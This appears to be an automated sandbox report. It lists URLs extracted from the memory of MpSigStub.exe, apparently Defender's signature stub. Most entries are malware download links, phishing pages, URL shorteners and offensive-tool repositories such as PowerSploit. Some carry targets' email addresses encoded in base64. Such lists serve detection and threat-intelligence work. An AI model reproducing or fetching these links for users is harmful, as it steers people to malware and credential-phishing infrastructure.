Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://hrupd00t.rest/kgwdt5pthdawnnewibpybtyht/?i8kka7gioxp=c2f1zglhy2fyz29pddiwmebzyxvkawfjyxjnby5
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: https://htrzogrzers.com/wed/opo.php
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://http://bit.do/fq3bf
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://hvaclinic.com/redirect/amvhbi1mcmfuy29pcy52yxnzzxvyqgjlzmvzys5jb20=
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://hx.ns-inhince.online/?e=arnaldi
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: https://i.gyazo.com/
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp String found in binary or memory: https://icam%.cl/wp%-content/%.%.%./%.%.%./x3%.php
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: https://ieaspk.com/instagram.dll
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: https://ieaspk.com/instagram.dllx
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: https://iffusedtrac.xyz/3/bbc.exe
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://ikkon.pk/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: https://immobiliareneri.casa/drms/ind.html
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: https://indygrace.com/sun/scan-img-rcsh-253018.exe
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: https://ines-arnshoff.de/
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: https://inetaccelerator.ru/
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://injectsorals.com/11/i.php
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://injectsorals.com/oja/
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: https://institutoimepe.com.br/jl/autooffice2errors
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://integratedcombatcentre.com.au/wp-content/uploads/tmp/outlook365/outlook365/index.php
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://inter-pipe.ga/
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: https://internetbanking.caixa.gov.br/SIIBC/index
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://invoiceadvantagereminder.ew.r.appspot.com/index.html#ivan.tiutiunnyk
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: https://ip4.seeip.org
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://iplogger.com
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://iplusprima.life/wp-content/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://iqras.pk/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://iqras.pk/inno/inno/innoc.doc
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://irecruiter.immentia.com/storage/framework/cache/data/0e/nC7vWe43YwJjj.php
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/b2qsmx
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/eakecx
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/fnchq3
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/nr85ic
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/p1cyuo
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/qyzae1
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/x73tnb
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/xwjqn2
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: https://istitutobpascalweb.it/mynotescom/renoovohostinglilnuxadvanced.php
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://itaubankline.itau.com.br/V1/PERS/IMG/bt_confirmar.gif
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/2aed6
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/9h7cn
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/cshd3
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/intdn
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/jbbhj
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/oiowg
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/vlafv
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/vyqcm
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: https://itvantaqe.com/wp/wp-admin/user/class.php
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://izmirdentalimplant.net/wp-content/themes/neve/next.php
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://j-k9.club/?e=JPohlman
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://jabaltoor.com/copy/img/blog/cat-post/r7gnor1h0.php
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: https://jadr223.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://jammuking.xyz/wp-content/upgrabe/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://jaypalsinh.ngsoftweb.eEvvmU%in/OLD_07032021/classeEvvmU%es/PHPExcel/Calculation/Token/pm4Cb7
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: https://jbg-electric.com/css/x0sjv3efx.php
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: https://jbrealestategroups.com/wp-content/themes/bridge/extendvc/msg.
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: https://jbs-stamping.square.site/
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: https://jdjuwuryh.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://jiagnmehn.gq/post.php
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://jiksh.com/?referrer=
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: https://jira3.cerner.com/rest/api/2/issue/
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: https://jjjkjkeh.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: https://josematechky.com/docs/ec21_order.doc
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://jovial-pasteur.159-89-118-202.plesk.page/wp-content/uploads/index.php
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: https://jrat.io
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: https://quirky-blackwell.23-227-196-69.plesk.page/mail/inbox%3dmessage/1/index.php
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: https://r0lls-r0yce.com/eft/remit.dotm?raw=true
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: https://rachelzy.com/yyyy/myoriginlogger.exe
Source: MpSigStub.exe, 00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp String found in binary or memory: https://radh.ga/konzo/change.php
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://raifeisen.co/invoice/id/305674567
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: https://ramashardware.co.za/
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: https://ramblerimport.com/hz4uhlut5au/yu.html
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: https://ramechanicsplus.work/manuel/ywrhbwtvdmfaa2vtcgvylmv1
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: https://rapid.cerner.com:8243/clientapi/v1.0/clients/mnemonic/
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/aybiota/mpbh33775/gh-pages/g9wl5dp.ttf
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/elevenpaths/ibombshell/
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/powershellmafia/powersploit/
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/sharkush/test1/master/calcush.sct
Source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/wmitoapi/test/master/compiler.zip
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: https://rawcdn.githack.net/up.php?key=5
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: https://rb.gy/kc5b5e
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://rb.gy/kc5b5e?#ncota
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp String found in binary or memory: https://realmjoin-backend-staging.azurewebsites.net/api/system/check
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://referralpays.com/aki2root/uzie/actions.php
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://register.hiramhousecamp.org/miouadthen/po1820.zip
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: https://relaja.me/qw5hlk1vcmvqb25azglzywdydxbvlmvz
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://relaja.me/u2viyxn0awfulln0sm9obkbtzxryb2jhbmsucgxjlnvr
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://remote.bittorrent.com
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://remoteally.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://reneerouleau.us/az/az.doc
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://rewardamericanexpress.blob.core.windows.net/aexp/online.americanexpress.com0smyca
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: https://rezultmedia.com/css/reportdhlnew.php
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp String found in binary or memory: https://rezultmedia.com/vendor/laravel/tinker/src/reportexcelnew.php
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: https://ringco.com.co/cache/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://rnatrixblade.net/nj.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://rollingrockcolumbia.com/wp-admin/admin-ajax.php
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://rotf.lol/3u6d9443
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: https://rw.mousewinning.club/?
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/119/10080008.xml
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/119/10080009.xml
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/900/10010045.xml
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/appPrefId/affPrefId.xml
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: https://s1.ax1x.com/2020/04/28/J4Zp9S.png
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp String found in binary or memory: https://s18.picofile.com/d/8435906618/a27ddc7a-8599-479b-9e19-f2fd4b1988c3/setup.exe
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: https://s3-ap-northeast-1.amazonaws.com/update-secure/asmsgrbarb.zip
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://s3-eu-west-1.amazonaws.com/adkooo/
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: https://s3.amazonaws.com/exec459/exec.tgz
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://s3.us-east-2.amazonaws.com/cotazion.pago/recibo.html
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://sad-goldwasser.62-108-34-75.plesk.page/doc00289?
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: https://scabraldealdun.com/hghgh/aridonorigin.exe
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: https://scalet.publicvm.com/large2/next.php
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: https://scaricapag.win/eco
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: https://screw-malwrhunterteams.com/scanme.txt
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://sddfdfdf.typeform.com/to/vrfwamwx
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: https://secure.hotbar.com/
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp String found in binary or memory: https://secure.logmeinrescue.com/
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp String found in binary or memory: https://secure.tibia.com/account/?subtopic=accountmanagement
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: https://secured-links.org/connect
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://secureloginauth.ru/mcavy/.dave.php
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://securezalink.com/home.jpg/security.ocx
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://seeing.mm.am/deluxe/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: https://selmersax.de/wp-content/themes/rehub/bpge/front/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://serv.fkn-srv.xyz/?e=tom.hughes
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://server.voiplogger0365.xyz/?e=csizemore
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: https://seyedishop.ir/rh1/pmt.php
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: https://shaastraarth.in/bbbg/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://shatha.n-idea.us/moo/
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp String found in binary or memory: https://shop.asopalav.com/ds/0302.gif
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://shoplady.xyz/glsdil.php
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://shoptimes.ro/admin/clienti/opo.php
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: https://shouldntthrowstones.co.uk/vv/exl-idnero.php?loginhtw952
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://shreyainfosoft.com/krishnasteelcorporation/next.php
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://shreyainfosoft.com/shayonajwellers/after.php
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: https://signin.ebay
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://simetrika.com/redirect/zg9uywxklmvhdmvzqgfjy2vsbgvudc5jb20=
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://sinavtakvim.icu/zx/ag.doc
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://sis.ieadar.com.br-$r)r/Igreja-master/agendaSec/css/Sq4D0WfbvSitsO.php
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://skripon.com/oozoo/document.php
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp String found in binary or memory: https://smartcheckautos%.com/wp%-content/%.%.%./%.%.%./x3%.php
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: https://smesalvado.sslblindado.com/d.doc
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://smpn1kunjangkediri.sch.id/wp-content/uploads/upgrabe/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://snowfall.top/eusetup.exe
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://soft-gps.com/wp-content/plugins/cvuohucwkp/tre/swt.php
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://sotheraho.com/wp-content/fonts/reportexcelnew.php
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp String found in binary or memory: https://southpolefaxnet.ml/number/brand.php
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://southvomes.sozouths.xyz/?e=
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp String found in binary or memory: https://specs2go.shawalzahid.com/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://ssl-proxy.my-addr.org/myaddrproxy.php/http://
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://ssl859.websiteseguro.com/downloadflash/dados/Juliana.jpg
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://ssl859.websiteseguro.com/downloadflash/dados/grdmody.jpg
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://ssl859.websiteseguro.com/downloadflash/dados/msnGRD.jpg
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: https://ssmdevelopers.in/4raxigaptfpm/yu.html
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: https://staging2.lifebiotic.com/novacms/grassandrocks.php
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://staralevator.com/anygas/
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://staralevator.com/anygas/nxt.php
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://static.wixstatic.com/ugd/05e470_b104c366c1f7423293887062c7354db2.doc
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://static.wixstatic.com/ugd/859f79_35181f339d694f87870220aa3da46c30.doc
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp String found in binary or memory: https://statsdev.com/header.jpg
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp String found in binary or memory: https://statseast.com/login.jpg
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://statsmag.com/apple/log.php
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: https://statsper.com/footer.jpg
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp String found in binary or memory: https://statssale.com/header.jpg
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://stepup.pt/sugar6/ww/s.dot
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://stitch-statichosting-prod.s3.amazonaws.com/5ffbf74f106b1ff88367ac90/5ffbf62cd17b985f24b01f73
Source: MpSigStub.exe, 00000024.00000003.6274632476.00000197A2E92000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/
Source: MpSigStub.exe, 00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/msofficeupdater/MSUpdater.exe
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/officexel/remittance%20invoice.zip
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://storagepinetown.co.za/1/14/?email=itsupport
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://storyofusstudios.com/n75oh9tzoyhz/lipa.html
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://stretchbuilder.com/chalkzone/next.php
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://stretchwrestle.com/ringcentral/wealth.php
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: https://subahj.linkpc.net/sarah2/next.php
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: https://submit-form.com/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://subwaybookreview.com/vl1/sample.doc
Source: MpSigStub.exe, 00000024.00000003.6293096859.00000197A3151000.00000004.00000001.sdmp String found in binary or memory: https://suggestor.pirrit.com/engine/getpopups.php
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: https://sumnermail.org/sumnerscools/school.php
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: https://sundersls.weebly.com
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://supplementsizeup.co.uk/aa/ger/login.php
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: https://surustore.com/imageY9a
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: https://sviescfze.com/iaret52086yla/next.php
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://sviescfze.com/ns735tey89dgwmo/next.php
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://sweetsizing.com/vip/
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://syr.us/gpn
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: https://t.co/ou2k0nuvi8)
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: https://t.me/File
